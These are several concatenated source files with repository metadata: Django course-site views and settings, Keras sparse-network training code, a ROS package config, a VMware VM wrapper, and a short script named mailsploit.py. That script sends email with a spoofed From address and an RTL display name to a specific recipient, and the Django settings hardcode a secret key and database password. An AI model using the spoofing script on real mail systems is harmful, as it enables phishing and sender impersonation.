075b1fb61a43ea56ed4d4f2407d7c6655c1f8e52
|
[] |
no_license
|
alex-run-code/educa
|
17931e02d7a08a5bd4fa65ce3a6aa5614388aca8
|
bbb4b42f816d9c4ff378beb215de6291b8e59448
|
refs/heads/main
| 2023-01-29T16:33:07.706400
| 2020-12-15T10:48:11
| 2020-12-15T10:48:11
| 319,874,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,557
|
py
|
from django.shortcuts import render
from django.urls import reverse_lazy
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import DetailView
from django.views.generic.list import ListView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from .models import Course
from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin
from django.shortcuts import redirect, get_object_or_404
from django.views.generic.base import TemplateResponseMixin, View
from .forms import ModuleFormSet
from django.forms.models import modelform_factory
from django.apps import apps
from .models import Module, Content
from braces.views import CsrfExemptMixin, JsonRequestResponseMixin
from django.db.models import Count
from .models import Subject
from students.forms import CourseEnrollForm
class ContentCreateUpdateView(TemplateResponseMixin, View):
    """Create or update one content item (text/video/image/file) of a module.

    The URL supplies the module id, the content model name and, for
    updates, the id of the existing object. Only the course owner may
    edit (enforced via get_object_or_404 filters).
    """
    module = None
    model = None
    obj = None
    template_name = 'courses/manage/content/form.html'

    def get_model(self, model_name):
        # Only the four known content models are editable; anything else
        # resolves to None (and later 404s when looked up).
        if model_name in ['text', 'video', 'image', 'file']:
            return apps.get_model(app_label='courses', model_name=model_name)
        return None

    def get_form(self, model, *args, **kwargs):
        # Build a ModelForm on the fly, hiding bookkeeping fields that are
        # filled in automatically on save.
        Form = modelform_factory(model, exclude=['owner',
                                                 'order',
                                                 'created',
                                                 'updated'])
        return Form(*args, **kwargs)

    def dispatch(self, request, module_id, model_name, id=None):
        # Resolve module/model/object once so get() and post() can reuse
        # them. (Removed leftover debug print('1')/print('2') statements.)
        self.module = get_object_or_404(Module, id=module_id, course__owner=request.user)
        self.model = self.get_model(model_name)
        if id:
            self.obj = get_object_or_404(self.model, id=id, owner=request.user)
        return super(ContentCreateUpdateView, self).dispatch(request, module_id, model_name, id)

    def get(self, request, module_id, model_name, id=None):
        # Unbound (create) or instance-bound (update) form.
        form = self.get_form(self.model, instance=self.obj)
        return self.render_to_response({'form': form,
                                        'object': self.obj})

    def post(self, request, module_id, model_name, id=None):
        form = self.get_form(self.model, instance=self.obj,
                             data=request.POST,
                             files=request.FILES)
        if form.is_valid():
            obj = form.save(commit=False)
            obj.owner = request.user
            obj.save()
            if not id:
                # new content: link the concrete item to its module
                Content.objects.create(module=self.module, item=obj)
            return redirect('module_content_list', self.module.id)
        # Invalid: re-render the form with validation errors.
        return self.render_to_response({'form': form,
                                        'object': self.obj})
class ContentDeleteView(View):
    """Delete one content item (and its underlying media object) from a module."""
    def post(self, request, id):
        # Only the owning instructor may delete; 404 otherwise.
        content = get_object_or_404(Content, id=id, module__course__owner=request.user)
        module = content.module
        # Delete the concrete item (Text/Video/...) first, then the generic
        # Content row that pointed at it.
        content.item.delete()
        content.delete()
        return redirect('module_content_list', module.id)
class OwnerMixin(object):
    """Restrict a view's queryset to objects owned by the requesting user."""
    def get_queryset(self):
        qs = super(OwnerMixin, self).get_queryset()
        # Only the current user's own objects are visible/editable.
        return qs.filter(owner=self.request.user)
class OwnerEditMixin(object):
    """Stamp the current user as owner when a model form saves successfully."""
    def form_valid(self, form):
        form.instance.owner = self.request.user
        return super(OwnerEditMixin, self).form_valid(form)
class OwnerCourseMixin(OwnerMixin, LoginRequiredMixin):
    """Base mixin for Course CRUD views: login required, owner-scoped queryset."""
    model = Course
    # Fields exposed in the create/update forms.
    fields = ['subject','title','slug','overview']
    # Destination after a successful create/update/delete.
    success_url = reverse_lazy('manage_course_list')
class OwnerCourseEditMixin(OwnerCourseMixin, OwnerEditMixin):
    """Shared form template for the Course create/update views.

    ``fields`` and ``success_url`` are inherited from OwnerCourseMixin;
    the byte-identical duplicate definitions were removed for consistency.
    """
    template_name = 'courses/manage/course/form.html'
class ManageCourseListView(OwnerCourseMixin, ListView):
    """List the courses owned by the logged-in instructor."""
    template_name = 'courses/manage/course/list.html'
class CourseCreateView(PermissionRequiredMixin, OwnerCourseEditMixin, CreateView):
    """Create a new course; requires the courses.add_course permission."""
    permission_required = 'courses.add_course'
class CourseUpdateView(PermissionRequiredMixin, OwnerCourseEditMixin, UpdateView):
    """Edit an existing course; requires the courses.change_course permission.

    ``template_name`` is inherited from OwnerCourseEditMixin (the original
    redundantly repeated the same value here).
    """
    permission_required = 'courses.change_course'
class CourseDeleteView(PermissionRequiredMixin, OwnerCourseMixin, DeleteView):
    """Confirm-and-delete view for a course owned by the current user."""
    template_name = 'courses/manage/course/delete.html'
    success_url = reverse_lazy('manage_course_list')
    permission_required = 'courses.delete_course'
class CourseModuleUpdateView(TemplateResponseMixin, View):
    """Add/edit/delete a course's modules through an inline formset."""
    template_name = 'courses/manage/module/formset.html'
    course = None
    def get_formset(self, data=None):
        # Bind the formset to this course; `data` carries POST data on submit.
        return ModuleFormSet(instance=self.course,
                             data=data)
    def dispatch(self, request, pk):
        # Resolve the course once (404 unless owned by the requester),
        # then let View.dispatch route to get()/post().
        self.course = get_object_or_404(Course, id=pk, owner=request.user)
        return super(CourseModuleUpdateView, self).dispatch(request, pk)
    def get(self, request, *args, **kwargs):
        formset = self.get_formset()
        return self.render_to_response({'course':self.course,
                                        'formset':formset})
    def post(self, request, *args, **kwargs):
        formset = self.get_formset(data=request.POST)
        if formset.is_valid():
            formset.save()
            return redirect('manage_course_list')
        # Invalid: re-render with validation errors.
        return self.render_to_response({'course':self.course,
                                        'formset':formset})
class ModuleContentListView(TemplateResponseMixin, View):
    """Show all content items of one module (course owner only)."""
    template_name = 'courses/manage/module/content_list.html'
    def get(self, request, module_id):
        module = get_object_or_404(Module,
                                   id=module_id,
                                   course__owner=request.user)
        return self.render_to_response({'module':module})
class ModuleOrderView(CsrfExemptMixin, JsonRequestResponseMixin, View):
    """AJAX endpoint persisting drag-and-drop ordering of a course's modules.

    Expects a JSON body mapping module id -> new order; the owner filter
    prevents reordering modules of other users' courses.
    """
    def post(self, request):
        for id, order in self.request_json.items():
            Module.objects.filter(id=id, course__owner=request.user).update(order=order)
        return self.render_json_response({'saved':'OK'})
class ContentOrderView(CsrfExemptMixin, JsonRequestResponseMixin, View):
    """AJAX endpoint persisting drag-and-drop ordering of a module's contents.

    Same JSON contract as ModuleOrderView, scoped to Content rows owned
    (via module -> course) by the requesting user.
    """
    def post(self, request):
        for id, order in self.request_json.items():
            Content.objects.filter(id=id, module__course__owner=request.user) \
                    .update(order=order)
        return self.render_json_response({'saved':'OK'})
class CourseListView(TemplateResponseMixin, View):
    """Public course catalogue, optionally filtered by subject slug."""
    model = Course
    template_name = 'courses/course/list.html'
    def get(self, request, subject=None):
        # Annotate counts so the template can show totals without N+1 queries.
        subjects = Subject.objects.annotate(total_courses=Count('courses'))
        courses = Course.objects.annotate(total_modules=Count('modules'))
        if subject:
            subject = get_object_or_404(Subject, slug=subject)
            courses = courses.filter(subject=subject)
        return self.render_to_response({'subjects': subjects,
                                        'subject': subject,
                                        'courses': courses})
class CourseDetailView(DetailView):
    """Public course detail page, with an enrollment form in the context."""
    model = Course
    template_name = 'courses/course/detail.html'
    def get_context_data(self, **kwargs):
        context = super(CourseDetailView, self).get_context_data(**kwargs)
        # Pre-bind the enroll form to this course for the template.
        context['enroll_form'] = CourseEnrollForm(initial={'course':self.object})
        return context
|
[
"acambefort@pentalog.com"
] |
acambefort@pentalog.com
|
b0183013bf5ccd8486f76a0a40e1385241afaec7
|
2fc31334b2996b8bdfb6ef0b71a1d5c0efd1e4ed
|
/mailsploit.py
|
a6ee28d813a25032a4b94ee9db4bda70e73251c7
|
[] |
no_license
|
shorti1996/mailsploit_me
|
6538a30a0199b4ef8b9cad0ade8fbdd50ab6a670
|
b042f613af7b8b944ee24975b3406aab8a76e828
|
refs/heads/master
| 2021-05-06T04:19:47.791260
| 2020-02-03T11:57:19
| 2020-02-03T11:57:19
| 114,993,158
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,119
|
py
|
import smtplib
import sys

from lazyme.string import color_print
from vals import nato_example

# Display name / From header used to demonstrate Mailsploit-style header
# spoofing; the commented alternative is another test payload.
spoofed_display_name = "עבריתעבריתעבריתעבריתעברית"
# spoofed_display_name = "gowno"
spoofed_from = "aaaa@pwr.edu.pl"
email_to = 'wliebert0116@gems.sw.rim.net'

# Hand-assembled RFC 822-style message; From carries the spoofed display name.
msg = """From: \"%s\" <%s>
To: %s
Subject: Test RTL\n
sdadasdasa
Test test
""" % (spoofed_display_name, spoofed_from, email_to)
msg = msg.encode()

SMTP_user = 'user@localhost'
SMTP_password = 'user'

server = None
try:
    server = smtplib.SMTP('localhost', 25)
    server.ehlo()  # optional
except Exception:
    color_print('Can\'t connect to SMTP', color='blue')
    # Without a connection every later call would raise AttributeError on
    # `server` being None (the original fell through and crashed); bail out.
    sys.exit(1)
server.set_debuglevel(1)
try:
    server.login(SMTP_user, SMTP_password)
except Exception:
    # Best effort, as before: some servers accept mail without auth.
    color_print('Can\'t authenticate with the server', color='blue')
try:
    server.sendmail(spoofed_from, [email_to], msg)
except Exception:
    color_print('Can\'t send an email', color='blue')
server.quit()
|
[
"shorti1996@gmail.com"
] |
shorti1996@gmail.com
|
4ae396cd061bc5d5104ddaff784f3ffe16673c89
|
32402ec0fb7cece6a4b7f64524f45196db48b8c6
|
/fmd_track/fmd_track/settings.py
|
b33acef3bddac9c0bd343e008d13abf11065c203
|
[] |
no_license
|
ArtyomMinsk/FMD_records
|
2a12c85211cdf93144bc1c1498bdfbf4cca94296
|
2bea82483b11de422f7bededc2a12d8211197c2c
|
refs/heads/master
| 2021-01-22T08:28:14.560321
| 2017-02-28T20:54:22
| 2017-02-28T20:54:22
| 81,902,019
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,212
|
py
|
"""
Django settings for fmd_track project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'd%@!p0w6906t^bo96rm@5%hk6-!dj8=_ib5=&o&7dc62=$y=gc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'fmd.apps.FmdConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'fmd_track.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'fmd_track.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'fmd_db',
'USER': 'Artyom',
'PASSWORD': 'sfi',
'HOST': '127.0.0.1',
'PORT': '5433',
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
[
"artem.nesterenko@gmail.com"
] |
artem.nesterenko@gmail.com
|
51a44f03eb696ececa3a9e650a63d3177d62f625
|
976a21364b7c54e7bccddf1c9deec74577ce8bb8
|
/build/rob_control/catkin_generated/pkg.develspace.context.pc.py
|
ae505c4d62a69cc0f460001a4541d25f31f1d6e7
|
[] |
no_license
|
jinweikim/catkin_ws
|
f0168b17c04863a6e5472f6199a4a9c525e0f3aa
|
268ce7e348a162019e90d0e4527de4c9140ac0f8
|
refs/heads/master
| 2023-01-02T17:23:06.834527
| 2020-10-23T12:03:49
| 2020-10-23T12:03:49
| 262,527,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 387
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "actionlib_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rob_control"
PROJECT_SPACE_DIR = "/home/jinwei/catkin_ws/devel"
PROJECT_VERSION = "0.0.0"
|
[
"jinweikim@gmail.com"
] |
jinweikim@gmail.com
|
2b6b9fdb0f744756e2cee975230f11c0238b45ea
|
31a928cff4960236923b6bc3b68e34bb2f46f470
|
/sparse-evolutionary-artificial-neural-networks/SET-MLP-Keras-Weights-Mask/set_mlp_keras_cifar10.py
|
1a61f24283ff805b0be5792da50162cb6b2a6831
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
webclinic017/ml_monorepo
|
707df2afd2f986eb0721d26430e6135c917817c6
|
945f0a83d6b94282c547bb6f4805f3381ad9c16a
|
refs/heads/master
| 2021-10-19T21:02:53.322944
| 2019-02-19T20:58:51
| 2019-02-23T20:06:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,286
|
py
|
# Author: Decebal Constantin Mocanu et al.;
# Proof of concept implementation of Sparse Evolutionary Training (SET) of Multi Layer Perceptron (MLP) on CIFAR10 using Keras and a mask over weights.
# This implementation can be used to test SET in varying conditions, using the Keras framework versatility, e.g. various optimizers, activation layers, tensorflow
# Also it can be easily adapted for Convolutional Neural Networks or other models which have dense layers
# However, due the fact that the weights are stored in the standard Keras format (dense matrices), this implementation can not scale properly.
# If you would like to build and SET-MLP with over 100000 neurons, please use the pure Python implementation from the folder "SET-MLP-Sparse-Python-Data-Structures"
# This is a pre-alpha free software and was tested with Python 3.5.2, Keras 2.1.3, Keras_Contrib 0.0.2, Tensorflow 1.5.0, Numpy 1.14;
# The code is distributed in the hope that it may be useful, but WITHOUT ANY WARRANTIES; The use of this software is entirely at the user's own risk;
# For an easy understanding of the code functionality please read the following articles.
# If you use parts of this code please cite the following articles:
#@article{Mocanu2018SET,
# author = {Mocanu, Decebal Constantin and Mocanu, Elena and Stone, Peter and Nguyen, Phuong H. and Gibescu, Madeleine and Liotta, Antonio},
# journal = {Nature Communications},
# title = {Scalable Training of Artificial Neural Networks with Adaptive Sparse Connectivity inspired by Network Science},
# year = {2018},
# doi = {10.1038/s41467-018-04316-3}
#}
#@Article{Mocanu2016XBM,
#author="Mocanu, Decebal Constantin and Mocanu, Elena and Nguyen, Phuong H. and Gibescu, Madeleine and Liotta, Antonio",
#title="A topological insight into restricted Boltzmann machines",
#journal="Machine Learning",
#year="2016",
#volume="104",
#number="2",
#pages="243--270",
#doi="10.1007/s10994-016-5570-z",
#url="https://doi.org/10.1007/s10994-016-5570-z"
#}
#@phdthesis{Mocanu2017PhDthesis,
#title = "Network computations in artificial intelligence",
#author = "D.C. Mocanu",
#year = "2017",
#isbn = "978-90-386-4305-2",
#publisher = "Eindhoven University of Technology",
#}
from __future__ import division
from __future__ import print_function
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras import optimizers
import numpy as np
from keras import backend as K
from keras_contrib.layers.advanced_activations import SReLU
from keras.datasets import cifar10
from keras.utils import np_utils
class Constraint(object):
    """Base class for weight constraints: the identity (no-op) constraint."""

    def __call__(self, w):
        # Default behaviour: leave the weight tensor untouched.
        return w

    def get_config(self):
        # The base constraint carries no configurable state.
        return {}
class MaskWeights(Constraint):
    """Constraint that zeroes out masked-off entries of a weight tensor.

    The binary mask is cast once to the backend float type so the
    elementwise multiply works directly against the weight tensor.
    """

    def __init__(self, mask):
        self.mask = K.cast(mask, K.floatx())

    def __call__(self, w):
        # In-place multiply, matching the original implementation exactly.
        w *= self.mask
        return w

    def get_config(self):
        return {'mask': self.mask}
def find_first_pos(array, value):
    """Return the index of the first element of `array` closest to `value`."""
    deltas = np.abs(array - value)
    return deltas.argmin()
def find_last_pos(array, value):
    """Return one past the index of the last element of `array` closest to `value`."""
    reversed_deltas = (np.abs(array - value))[::-1]
    return array.shape[0] - reversed_deltas.argmin()
def createWeightsMask(epsilon, noRows, noCols):
    """Build an Erdos-Renyi random binary mask for a noRows x noCols layer.

    `epsilon` scales how many connections survive; larger epsilon means a
    denser mask. Returns [active_connection_count, mask].
    """
    samples = np.random.rand(noRows, noCols)
    # Probability that a connection is absent.
    drop_prob = 1 - (epsilon * (noRows + noCols)) / (noRows * noCols)
    # Threshold the uniform samples into a {0, 1} mask.
    samples[samples < drop_prob] = 0
    samples[samples >= drop_prob] = 1
    active = np.sum(samples)
    print ("Create Sparse Matrix: No parameters, NoRows, NoCols ", active, noRows, noCols)
    return [active, samples]
class SET_MLP_CIFAR10:
    """Sparse Evolutionary Training (SET) of an MLP on CIFAR10.

    A 3-hidden-layer MLP whose dense layers are masked to an Erdos-Renyi
    sparse topology; after every epoch the smallest-magnitude weights are
    pruned and the same number of random connections are regrown.

    NOTE(review): instantiating this class immediately builds AND trains
    the model (see __init__) -- construction is a long-running operation.
    """
    def __init__(self):
        # set model parameters
        self.epsilon = 20 # control the sparsity level as discussed in the paper
        self.zeta = 0.3 # the fraction of the weights removed
        self.batch_size = 100 # batch size
        self.maxepoches = 1000 # number of epochs
        self.learning_rate = 0.01 # SGD learning rate
        self.num_classes = 10 # number of classes
        self.momentum=0.9 # SGD momentum
        # generate an Erdos Renyi sparse weights mask for each layer
        [self.noPar1, self.wm1] = createWeightsMask(self.epsilon,32 * 32 *3, 4000)
        [self.noPar2, self.wm2] = createWeightsMask(self.epsilon,4000, 1000)
        [self.noPar3, self.wm3] = createWeightsMask(self.epsilon,1000, 4000)
        # initialize layers weights (None => Keras default initialization)
        self.w1 = None
        self.w2 = None
        self.w3 = None
        self.w4 = None
        # initialize weights for SReLu activation function
        self.wSRelu1 = None
        self.wSRelu2 = None
        self.wSRelu3 = None
        # create a SET-MLP model
        self.create_model()
        # train the SET-MLP model
        self.train()
    def create_model(self):
        """(Re)build the Keras model, restoring any weights saved by
        weightsEvolution(); called once per epoch after the session reset."""
        # create a SET-MLP model for CIFAR10 with 3 hidden layers
        self.model = Sequential()
        self.model.add(Flatten(input_shape=(32, 32, 3)))
        self.model.add(Dense(4000, name="sparse_1",kernel_constraint=MaskWeights(self.wm1),weights=self.w1))
        self.model.add(SReLU(name="srelu1",weights=self.wSRelu1))
        self.model.add(Dropout(0.3))
        self.model.add(Dense(1000, name="sparse_2",kernel_constraint=MaskWeights(self.wm2),weights=self.w2))
        self.model.add(SReLU(name="srelu2",weights=self.wSRelu2))
        self.model.add(Dropout(0.3))
        self.model.add(Dense(4000, name="sparse_3",kernel_constraint=MaskWeights(self.wm3),weights=self.w3))
        self.model.add(SReLU(name="srelu3",weights=self.wSRelu3))
        self.model.add(Dropout(0.3))
        self.model.add(Dense(self.num_classes, name="dense_4",weights=self.w4)) #please note that there is no need for a sparse output layer as the number of classes is much smaller than the number of input hidden neurons
        self.model.add(Activation('softmax'))
    def rewireMask(self,weights, noWeights):
        """Prune the zeta fraction of smallest-magnitude weights and regrow
        the same number of random connections; returns the new mask and the
        mask of surviving (kept) connections."""
        # rewire weight matrix
        # remove zeta largest negative and smallest positive weights
        values = np.sort(weights.ravel())
        firstZeroPos = find_first_pos(values, 0)
        lastZeroPos = find_last_pos(values, 0)
        largestNegative = values[int((1-self.zeta) * firstZeroPos)]
        smallestPositive = values[int(min(values.shape[0] - 1, lastZeroPos +self.zeta * (values.shape[0] - lastZeroPos)))]
        rewiredWeights = weights.copy();
        rewiredWeights[rewiredWeights > smallestPositive] = 1;
        rewiredWeights[rewiredWeights < largestNegative] = 1;
        rewiredWeights[rewiredWeights != 1] = 0;
        weightMaskCore = rewiredWeights.copy()
        # add zeta random weights
        nrAdd = 0
        noRewires = noWeights - np.sum(rewiredWeights)
        while (nrAdd < noRewires):
            i = np.random.randint(0, rewiredWeights.shape[0])
            j = np.random.randint(0, rewiredWeights.shape[1])
            if (rewiredWeights[i, j] == 0):
                rewiredWeights[i, j] = 1
                nrAdd += 1
        return [rewiredWeights, weightMaskCore]
    def weightsEvolution(self):
        """Snapshot all layer weights, rewire the sparse masks, and zero the
        weights of pruned connections so create_model() restores a
        consistent state."""
        # this represents the core of the SET procedure. It removes the weights closest to zero in each layer and add new random weights
        self.w1 = self.model.get_layer("sparse_1").get_weights()
        self.w2 = self.model.get_layer("sparse_2").get_weights()
        self.w3 = self.model.get_layer("sparse_3").get_weights()
        self.w4 = self.model.get_layer("dense_4").get_weights()
        self.wSRelu1 = self.model.get_layer("srelu1").get_weights()
        self.wSRelu2 = self.model.get_layer("srelu2").get_weights()
        self.wSRelu3 = self.model.get_layer("srelu3").get_weights()
        [self.wm1, self.wm1Core] = self.rewireMask(self.w1[0], self.noPar1)
        [self.wm2, self.wm2Core] = self.rewireMask(self.w2[0], self.noPar2)
        [self.wm3, self.wm3Core] = self.rewireMask(self.w3[0], self.noPar3)
        self.w1[0] = self.w1[0] * self.wm1Core
        self.w2[0] = self.w2[0] * self.wm2Core
        self.w3[0] = self.w3[0] * self.wm3Core
    def train(self):
        """Train for maxepoches epochs, rewiring the sparse topology and
        rebuilding the model between epochs."""
        # read CIFAR10 data
        [x_train,x_test,y_train,y_test]=self.read_data()
        #data augmentation
        datagen = ImageDataGenerator(
            featurewise_center=False,  # set input mean to 0 over the dataset
            samplewise_center=False,  # set each sample mean to 0
            featurewise_std_normalization=False,  # divide inputs by std of the dataset
            samplewise_std_normalization=False,  # divide each input by its std
            zca_whitening=False,  # apply ZCA whitening
            rotation_range=10,  # randomly rotate images in the range (degrees, 0 to 180)
            width_shift_range=0.1,  # randomly shift images horizontally (fraction of total width)
            height_shift_range=0.1,  # randomly shift images vertically (fraction of total height)
            horizontal_flip=True,  # randomly flip images
            vertical_flip=False)  # randomly flip images
        datagen.fit(x_train)
        self.model.summary()
        # training process in a for loop
        self.accuracies_per_epoch=[]
        for epoch in range(0,self.maxepoches):
            sgd = optimizers.SGD(lr=self.learning_rate, momentum=self.momentum)
            self.model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
            # NOTE(review): epochs=epoch with initial_epoch=epoch-1 trains a
            # single epoch per iteration; at epoch 0 this pair is (0, -1) --
            # confirm against the Keras version's fit_generator semantics.
            historytemp = self.model.fit_generator(datagen.flow(x_train, y_train,
                                                                batch_size=self.batch_size),
                                                   steps_per_epoch=x_train.shape[0]//self.batch_size,
                                                   epochs=epoch,
                                                   validation_data=(x_test, y_test),
                                                   initial_epoch=epoch-1)
            self.accuracies_per_epoch.append(historytemp.history['val_acc'][0])
            #ugly hack to avoid tensorflow memory increase for multiple fit_generator calls. Theano shall work more nicely this but it is outdated in general
            self.weightsEvolution()
            K.clear_session()
            self.create_model()
        self.accuracies_per_epoch=np.asarray(self.accuracies_per_epoch)
    def read_data(self):
        """Load CIFAR10, one-hot the labels, and standardize the images
        using the training set's mean/std (applied to the test set too)."""
        #read CIFAR10 data
        (x_train, y_train), (x_test, y_test) = cifar10.load_data()
        y_train = np_utils.to_categorical(y_train, self.num_classes)
        y_test = np_utils.to_categorical(y_test, self.num_classes)
        x_train = x_train.astype('float32')
        x_test = x_test.astype('float32')
        #normalize data
        xTrainMean = np.mean(x_train, axis=0)
        xTtrainStd = np.std(x_train, axis=0)
        x_train = (x_train - xTrainMean) / xTtrainStd
        x_test = (x_test - xTrainMean) / xTtrainStd
        return [x_train, x_test, y_train, y_test]
if __name__ == '__main__':
    # create and run a SET-MLP model on CIFAR10
    # NOTE(review): constructing the object immediately trains the full model
    # (see SET_MLP_CIFAR10.__init__); this is a long-running entry point.
    model=SET_MLP_CIFAR10()
    # save accuracies over for all training epochs
    # in "results" folder you can find the output of running this file
    # NOTE(review): assumes a "results/" directory already exists -- confirm.
    np.savetxt("results/set_mlp_srelu_sgd_cifar10_acc.txt", np.asarray(model.accuracies_per_epoch))
|
[
"tmichael.yu@gmail.com"
] |
tmichael.yu@gmail.com
|
38c685e5b3daa3c48549492e8305d7c6ec9b4a63
|
12b41c3bddc48a6df5e55bd16f7b2792ed6e4848
|
/k8_vmware/vsphere/VM.py
|
7d14aa69fb7f78566e20968c659a9f980499f6e4
|
[
"Apache-2.0"
] |
permissive
|
NourEddineX/k8-vmware
|
b128b03b988f8a94d6029458c5415cdd68e12b0a
|
80f2a6d56021a1298919487c8372a88aff3f1fb9
|
refs/heads/main
| 2023-01-23T22:59:41.767216
| 2020-12-11T12:33:11
| 2020-12-11T12:33:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,321
|
py
|
import pyVmomi
from osbot_utils.utils.Misc import wait
from k8_vmware.vsphere.VM_Keystroke import VM_Keystroke
class VM:
    """Convenience wrapper around a pyVmomi VirtualMachine managed object.

    Accessors delegate to ``self.vm``; ``summary()`` notes that each access
    of ``self.vm.summary`` is a REST round-trip, so helpers needing several
    values (e.g. ``info()``) fetch the summary once and reuse it.
    """

    def __init__(self, vm):
        self.vm = vm  # pyVmomi VirtualMachine managed object

    def config(self):
        return self.summary().config

    def controller_scsi(self):
        # Default to returning the first SCSI controller, if any exist.
        controllers = self.devices_SCSI_Controllers()
        if len(controllers) > 0:
            return controllers[0]

    def controller_ide(self):
        # Default to returning the first IDE controller, if any exist.
        controllers = self.devices_IDE_Controllers()
        if len(controllers) > 0:
            return controllers[0]

    def controller_ide_free_slot(self):
        # An IDE controller holds at most two devices; return the first
        # controller with a free slot.
        controllers = self.devices_IDE_Controllers()
        for controller in controllers:
            if len(controller.device) < 2:
                return controller

    def devices(self):
        return self.vm.config.hardware.device

    # One accessor per virtual-device class; all delegate to devices_of_type.
    def devices_IDE_Controllers  (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualIDEController )
    def devices_Cdroms           (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualCdrom         )
    def devices_Disks            (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualDisk          )
    def devices_AHCI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualAHCIController)
    def devices_PCNet_32s        (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualPCNet32       )
    def devices_Vmxnet_2s        (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet2       )
    def devices_Vmxnet_3s        (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet3       )
    def devices_E1000s           (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000         )
    def devices_E1000es          (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000e        )
    def devices_SCSI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSCSIController)
    def devices_Sriov_EthernetCards(self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSriovEthernetCard)

    def devices_of_type(self, type):
        """Return all virtual devices that are instances of `type`."""
        devices = []
        for device in self.devices():
            if isinstance(device, type):
                devices.append(device)
        return devices

    def devices_indexed_by_label(self):
        """Return {device label: device} for every virtual device."""
        devices = {}
        for device in self.devices():
            devices[device.deviceInfo.label] = device
        return devices

    def guest(self):
        return self.summary().guest

    def info(self):
        """Return a dict snapshot of the VM's key properties.

        Fetches summary() once, since each reference to self.vm.summary.*
        would otherwise issue a separate REST call to the server.
        """
        summary = self.summary()
        config  = summary.config
        guest   = summary.guest
        runtime = summary.runtime
        info = {
            "Annotation"      : config.annotation      ,
            "BootTime"        : str(runtime.bootTime)  ,
            "ConnectionState" : runtime.connectionState,
            "GuestId"         : config.guestId         ,
            "GuestFullName"   : config.guestFullName   ,
            "Host"            : runtime.host           ,
            "HostName"        : guest.hostName         ,
            "IP"              : guest.ipAddress        ,
            "MemorySizeMB"    : config.memorySizeMB    ,
            "MOID"            : self.vm._moId          ,
            "Name"            : config.name            ,
            "MaxCpuUsage"     : runtime.maxCpuUsage    ,
            "MaxMemoryUsage"  : runtime.maxMemoryUsage ,
            "NumCpu"          : config.numCpu          ,
            "PathName"        : config.vmPathName      ,
            "StateState"      : runtime.powerState     ,
            "Question"        : None                   ,
            "UUID"            : config.uuid
        }
        if runtime.question is not None:
